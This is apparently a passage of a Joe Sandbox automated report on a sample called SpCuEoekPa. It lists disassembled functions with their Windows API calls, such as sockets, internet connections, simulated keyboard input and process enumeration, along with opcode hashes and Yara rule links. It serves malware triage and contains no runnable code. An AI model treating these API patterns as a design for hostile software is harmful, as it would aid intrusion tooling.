                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003B9AD2
                                                            • __itow.LIBCMT ref: 003B9B03
                                                              • Part of subcall function 003B9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003B9DBE
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003B9B6C
                                                            • __itow.LIBCMT ref: 003B9BC3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
                                                            • Instruction ID: 8a2407781863a176dc340eee350bc567ca61c560ebe7fee79a90469c347dabd9
                                                            • Opcode Fuzzy Hash: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
                                                            • Instruction Fuzzy Hash: 5A419670A00308ABDF16EF54D845BFE7BB9EF44718F40406AFA05AB291DB709E44CBA1
                                                            Function 003D69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 003D69D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D69E1
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003D6A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D6A51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
                                                            • Instruction ID: d2fce5d8bf8180337b7281bc9c1da5545343c04853619bef49ec19fed75ac7de
                                                            • Opcode Fuzzy Hash: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
                                                            • Instruction Fuzzy Hash: 30419175640200AFEB62AF64DC87F2A77E89F19B54F04C519FA59AF3C2DAB09D008791
                                                            Function 003D641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003EF910), ref: 003D64A7
                                                            • _strlen.LIBCMT ref: 003D64D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 21895618e06495422c1c28dcd7f669c9613508227507e46d3147610531e72f36
                                                            • Instruction ID: 07842bdea16d38c6951b41292ea44df737e763c0363147d1518ca3e5b6ad5450
                                                            • Opcode Fuzzy Hash: 21895618e06495422c1c28dcd7f669c9613508227507e46d3147610531e72f36
                                                            • Instruction Fuzzy Hash: A041A572500104AFCB16EBA4EC96FAEB7ADAF05310F108156F9259F396DB30AD44CB50
                                                            Function 003CB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003CB89E
                                                            • GetLastError.KERNEL32(?,00000000), ref: 003CB8C4
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003CB8E9
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003CB915
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 87ce63e72a26213b37a502a0f8c4fb65c51326079498e032720430676d44f13a
                                                            • Instruction ID: 605ec88d26b1d58e6d398734a678d0d5cd68e5cf8cd74f5e1ed01faa63d6b293
                                                            • Opcode Fuzzy Hash: 87ce63e72a26213b37a502a0f8c4fb65c51326079498e032720430676d44f13a
                                                            • Instruction Fuzzy Hash: CE41E439600A50DFCB12EF55C485B59BBE9AF4A310F19C099ED4AAF366CB31ED01CB91
                                                            Function 003E8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003E88DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 0cb032ac193d95e787913ea2043585810ccaf0e084699ca3965e5fee99c2bc80
                                                            • Instruction ID: 4c762f31e3f71fa64dd272ad166239cd3a1fe16ff801daa35e73f02f70148e12
                                                            • Opcode Fuzzy Hash: 0cb032ac193d95e787913ea2043585810ccaf0e084699ca3965e5fee99c2bc80
                                                            • Instruction Fuzzy Hash: 21310530E001A8AFEF239B56DC45BB837A4EB05310F914711F919EA1E2CF7199409752
                                                            Function 003EAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 003EAB60
                                                            • GetWindowRect.USER32(?,?), ref: 003EABD6
                                                            • PtInRect.USER32(?,?,003EC014), ref: 003EABE6
                                                            • MessageBeep.USER32(00000000), ref: 003EAC57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 3cdf84c19debc7080002520037a000ab62f553785599845fa21e1be3430981f5
                                                            • Instruction ID: c1c2e4f7149f725506be329786eb6ff6e2b7218674bc5fdb9eba2694e143e278
                                                            • Opcode Fuzzy Hash: 3cdf84c19debc7080002520037a000ab62f553785599845fa21e1be3430981f5
                                                            • Instruction Fuzzy Hash: 244160306009A9DFCB22DF5AD884B697BF5FB49310F2582A9E415DF2A0D770B841CB92
                                                            Function 003C0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003C0B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 003C0B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003C0BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003C0BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: a3551ca53a04dc927c556bedddb6c7dab961431832586f3c67eeb25c5b853a8d
                                                            • Instruction ID: 891f362f0a52270a289d1800fcfec849ce1630620c325cd2fb3e5cfe17366544
                                                            • Opcode Fuzzy Hash: a3551ca53a04dc927c556bedddb6c7dab961431832586f3c67eeb25c5b853a8d
                                                            • Instruction Fuzzy Hash: 93312630A40688EEFB3ACB258C05FFABBA9AB45328F04435EE595D61D1C3B5CD409761
                                                            Function 003C0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003C0C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 003C0C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 003C0CE1
                                                            • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003C0D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 581af58913d5856a0db9862c9b20c694e2db37709578169e227271b7059ad1f3
                                                            • Instruction ID: 5ba73dddf51b2fef59ed215289d82cd8bf0dfc30aec5eb8b96a2cb97837f28c6
                                                            • Opcode Fuzzy Hash: 581af58913d5856a0db9862c9b20c694e2db37709578169e227271b7059ad1f3
                                                            • Instruction Fuzzy Hash: B3314630940798EEFF3A8B648C08FFEBB6AAB45314F04832EE491EA5D1C3799D458751
                                                            Function 003961C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003961FB
                                                            • __isleadbyte_l.LIBCMT ref: 00396229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00396257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0039628D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: ce2e31214ff0f8ae3403930c8e52ed13806e26a0a026e7b952c94d904c514b7f
                                                            • Instruction ID: b0deb9e1048abb936c43deeb1fab6caeee7d7a9cd5e1f49dd7962c8796079bb3
                                                            • Opcode Fuzzy Hash: ce2e31214ff0f8ae3403930c8e52ed13806e26a0a026e7b952c94d904c514b7f
                                                            • Instruction Fuzzy Hash: 7831D230606246AFDF239F75CC46BAA7BB9FF41310F164529E8A48B191D730E950D790
                                                            Function 003E4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 003E4F02
                                                              • Part of subcall function 003C3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003C365B
                                                              • Part of subcall function 003C3641: GetCurrentThreadId.KERNEL32 ref: 003C3662
                                                              • Part of subcall function 003C3641: AttachThreadInput.USER32(00000000,?,003C5005), ref: 003C3669
                                                            • GetCaretPos.USER32(?), ref: 003E4F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 003E4F4E
                                                            • GetForegroundWindow.USER32 ref: 003E4F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: c77e18608f8a0e3b2ab7f4c8daa791f3cdd032e6425cfb36833d064bc4376680
                                                            • Instruction ID: 415c53682aede030c64b5a58ff253fb393b06c0d6865644bd50aeffbba88da44
                                                            • Opcode Fuzzy Hash: c77e18608f8a0e3b2ab7f4c8daa791f3cdd032e6425cfb36833d064bc4376680
                                                            • Instruction Fuzzy Hash: 79313EB1D00108AFCB11EFA5C885EEFB7FDEF99304F10816AE415EB241DA719E058BA1
                                                            Function 003C3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 003C3C7A
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 003C3C88
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 003C3CA8
                                                            • CloseHandle.KERNEL32(00000000), ref: 003C3D52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: c5fcd3a72658cdfad1a823cf1043b5bce63a55b9ceeca3e4ac074c0af888d9c9
                                                            • Instruction ID: bc0be360c47f38ff69d43939e56ec0b594218c26fb5e7971a6e426566c9c7340
                                                            • Opcode Fuzzy Hash: c5fcd3a72658cdfad1a823cf1043b5bce63a55b9ceeca3e4ac074c0af888d9c9
                                                            • Instruction Fuzzy Hash: B63191721083459FD312EF50C885FAFBBE8AF95354F50492DF482CA1A1EB719E49CB92
                                                            Function 003EC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • GetCursorPos.USER32(?), ref: 003EC4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0039B9AB,?,?,?,?,?), ref: 003EC4E7
                                                            • GetCursorPos.USER32(?), ref: 003EC534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0039B9AB,?,?,?), ref: 003EC56E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 2d2db81ebe1832f61f2de21a8af3b0174257f4e903aae730d2a57b6680988f0a
                                                            • Instruction ID: 27b1a84bf19492f4f8d5f4a8bcdd01b1e26aa2cb1ee72ce5847d183cacb5d3b1
                                                            • Opcode Fuzzy Hash: 2d2db81ebe1832f61f2de21a8af3b0174257f4e903aae730d2a57b6680988f0a
                                                            • Instruction Fuzzy Hash: 0B31E5356100A8AFCF228F5AC898EFE7BB9EB0A310F404265F9058B2E1C7316D51DF94
                                                            Function 003B8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
                                                              • Part of subcall function 003B810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
                                                              • Part of subcall function 003B810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
                                                              • Part of subcall function 003B810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
                                                              • Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003B86A3
                                                            • _memcmp.LIBCMT ref: 003B86C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B86FC
                                                            • HeapFree.KERNEL32(00000000), ref: 003B8703
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: 5633f21f8b878a6ea5f25fb9b80706cab89cfaef4740ca94ac3d3ad2da027e28
                                                            • Instruction ID: 778f7bd52824da59d3c2d1b715e2d14220dabf62240565e4b0127dc7bc1a7322
                                                            • Opcode Fuzzy Hash: 5633f21f8b878a6ea5f25fb9b80706cab89cfaef4740ca94ac3d3ad2da027e28
                                                            • Instruction Fuzzy Hash: 14219D71E01208EFDB11DFA8C949BEEB7BCEF45308F158059E644AB280DB70AE05CB90
                                                            Function 0038098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __setmode.LIBCMT ref: 003809AE
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                            • _fprintf.LIBCMT ref: 003809E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 003B5DBB
                                                              • Part of subcall function 00384AAA: _flsall.LIBCMT ref: 00384AC3
                                                            • __setmode.LIBCMT ref: 00380A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
                                                            • Instruction ID: 4c4aa11221df62732956886dc9de5610a1cd186710fd376aeb509d1a75d442d2
                                                            • Opcode Fuzzy Hash: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
                                                            • Instruction Fuzzy Hash: 87112731504345AFDB0BB3B49C469FE77AC9F45320F2041AAF2059F582EF31594647A1
                                                            Function 003D1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D17A3
                                                              • Part of subcall function 003D182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
                                                              • Part of subcall function 003D182D: InternetCloseHandle.WININET(00000000), ref: 003D18E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
                                                            • Instruction ID: d7f394dfbe5db68975d2ccfb29ed7c11badb8bacc8a785ce506e62069ceb38be
                                                            • Opcode Fuzzy Hash: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
                                                            • Instruction Fuzzy Hash: 40215076200605BFEB239F60EC41BBABBADFB88710F10412BF9559A790D7719911A7A0
                                                            Function 003C3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,003EFAC0), ref: 003C3A64
                                                            • GetLastError.KERNEL32 ref: 003C3A73
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 003C3A82
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003EFAC0), ref: 003C3ADF
                                                            Memory Dump Source
